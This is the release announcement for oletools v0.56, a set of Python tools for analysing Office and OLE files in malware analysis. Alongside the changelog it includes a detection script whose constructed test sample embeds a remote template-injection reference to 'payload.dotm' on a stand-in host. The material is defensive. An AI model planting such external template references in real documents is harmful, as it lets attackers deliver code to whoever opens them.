oletools v0.56: analyze MS OLE2 files & MS Office documents, for malware analysis, forensics & debugging
oletools is a package of Python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser.
- olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
- oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
- olemeta: to extract all standard properties (metadata) from OLE files.
- oletimes: to extract creation and modification timestamps of all streams and storages.
- oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
- olemap: to display a map of all the sectors in an OLE file.
- olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
- MacroRaptor: to detect malicious VBA Macros.
- pyxswf: to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.
- oleobj: to extract embedded objects from OLE files.
- rtfobj: to extract embedded objects from RTF files.
- and a few others (coming soon)
What's new in v0.56 (olevba unless another tool is named):
- added detection of trigger _OnConnecting
- updated plugin_biff to v0.0.17 to improve Excel 4/XLM macros parsing
- added simple analysis of Excel 4/XLM macros in XLSM files (PR #569)
- added detection of template injection (PR #569)
- added detection of many suspicious keywords (PR #591 and #569, see https://www.certego.net/en/news/advanced-vba-macros/)
- improved MHT detection (PR #532)
- added --no-xlm option to disable Excel 4/XLM macros parsing (PR #532)
- fixed bug when decompressing raw chunks in VBA (issue #575)
- fixed bug with email package due to monkeypatch for MHT parsing (issue #602, PR #604)
- fixed option --relaxed (issue #596, PR #595)
- enabled relaxed mode by default (issues #477, #593)
- fixed detect_vba_macros to always return VBA code as unicode on Python 3 (issues #455, #477, #587, #593)
- replaced option --pcode by --show-pcode and --no-pcode, replaced optparse by argparse (PR #479)
- oleform: improved form parsing (PR #532)
- oleobj: "Ole10Native" is now case insensitive (issue #541)
- clsid: added PDF (issue #552), Microsoft Word Picture (issue #571)
- ppt_parser: fixed bug on Python 3 (issues #177, #607, PR #450)
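Two of the new olevba detections above, Excel 4/XLM macro sheets in XLSM files and remote template injection, live in the relationship (.rels) parts of an OOXML container rather than in the VBA project. The script below is an added example, not olevba's own code: it walks every .rels part of an OOXML zip with the standard library only and reports a VBA project, an XLM macro sheet, and any attachedTemplate relationship whose TargetMode is External (the case that makes Word fetch a .dotm from a remote host on open). The sample documents, the relationship-type names matched on their last URI segment, and the 198.51.100.7 address are constructed for the example; an internal attached template such as Normal.dotm is deliberately not reported.

```python
"""Scan an OOXML container (docx/xlsm/...) for VBA, XLM macro sheets and
remote template injection by reading its .rels parts.  Added example built on
the standard library; it is not olevba's implementation."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types are compared on their last path segment because the URI
# prefix differs between the openxmlformats and microsoft.com namespaces.
TYPE_ATTACHED_TEMPLATE = "attachedTemplate"
TYPE_XLM_MACROSHEET = "xlMacrosheet"
TYPE_VBA_PROJECT = "vbaProject"


def scan_ooxml(data):
    """Return {"vba": bool, "xlm": bool, "template_injection": [targets]}.

    Only attachedTemplate relationships with TargetMode="External" are listed
    as template injection; an internal attached template is normal.
    """
    found = {"vba": False, "xlm": False, "template_injection": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # damaged .rels part: skip it in this example
            for rel in root.iter(REL_NS + "Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if rtype == TYPE_VBA_PROJECT:
                    found["vba"] = True
                elif rtype == TYPE_XLM_MACROSHEET:
                    found["xlm"] = True
                elif rtype == TYPE_ATTACHED_TEMPLATE and external:
                    found["template_injection"].append(target)
    return found


def build_sample(parts):
    """Build a minimal OOXML-like zip in memory from {path: content}.
    Constructed test data, not a real Office document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in parts.items():
            zf.writestr(path, content)
    return buf.getvalue()


RELS_OPEN = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
RELS_CLOSE = "</Relationships>"
OX = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MS = "http://schemas.microsoft.com/office/2006/relationships/"


def sample_template_injection():
    """docx whose settings pull a template from a remote (constructed) host."""
    return build_sample({
        "word/document.xml": "<document/>",
        "word/_rels/settings.xml.rels": RELS_OPEN
        + '<Relationship Id="rId1" Type="' + OX + 'attachedTemplate"'
        + ' Target="http://198.51.100.7/payload.dotm" TargetMode="External"/>'
        + RELS_CLOSE,
    })


def sample_xlsm_with_xlm():
    """xlsm carrying both a VBA project and an Excel 4 macro sheet."""
    return build_sample({
        "xl/workbook.xml": "<workbook/>",
        "xl/vbaProject.bin": b"\xd0\xcf\x11\xe0placeholder",  # not a real project
        "xl/macrosheets/sheet1.xml": "<macrosheet/>",
        "xl/_rels/workbook.xml.rels": RELS_OPEN
        + '<Relationship Id="rId1" Type="' + MS + 'vbaProject" Target="vbaProject.bin"/>'
        + '<Relationship Id="rId2" Type="' + MS + 'xlMacrosheet" Target="macrosheets/sheet1.xml"/>'
        + RELS_CLOSE,
    })


def sample_clean_docx():
    """docx attached to its local Normal.dotm: must not be flagged."""
    return build_sample({
        "word/document.xml": "<document/>",
        "word/_rels/settings.xml.rels": RELS_OPEN
        + '<Relationship Id="rId1" Type="' + OX + 'attachedTemplate" Target="Normal.dotm"/>'
        + RELS_CLOSE,
    })


if __name__ == "__main__":
    for label, doc in (("template injection", sample_template_injection()),
                       ("xlsm with XLM", sample_xlsm_with_xlm()),
                       ("clean docx", sample_clean_docx())):
        print(label, "->", scan_ooxml(doc))
```

Run it as a script to see the three verdicts; to use it on a real file, pass `open(path, "rb").read()` to `scan_ooxml`. A `.rels` part that fails to parse is skipped here, which is a deliberate simplification: in triage a malformed relationship part is itself worth opening by hand.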
Download and Install:
The recommended way to download and install/update the latest stable release of oletools is to use pip:
- On Linux/Mac:
sudo -H pip install -U oletools
- On Windows:
pip install -U oletools
This should automatically create command-line scripts to run each tool (for example olevba, oleid, rtfobj) from any directory.
To get the latest development version instead:
- On Linux/Mac:
sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip
- On Windows:
pip install -U https://github.com/decalage2/oletools/archive/master.zip
Copyright (c) 2012-2019 Philippe Lagadec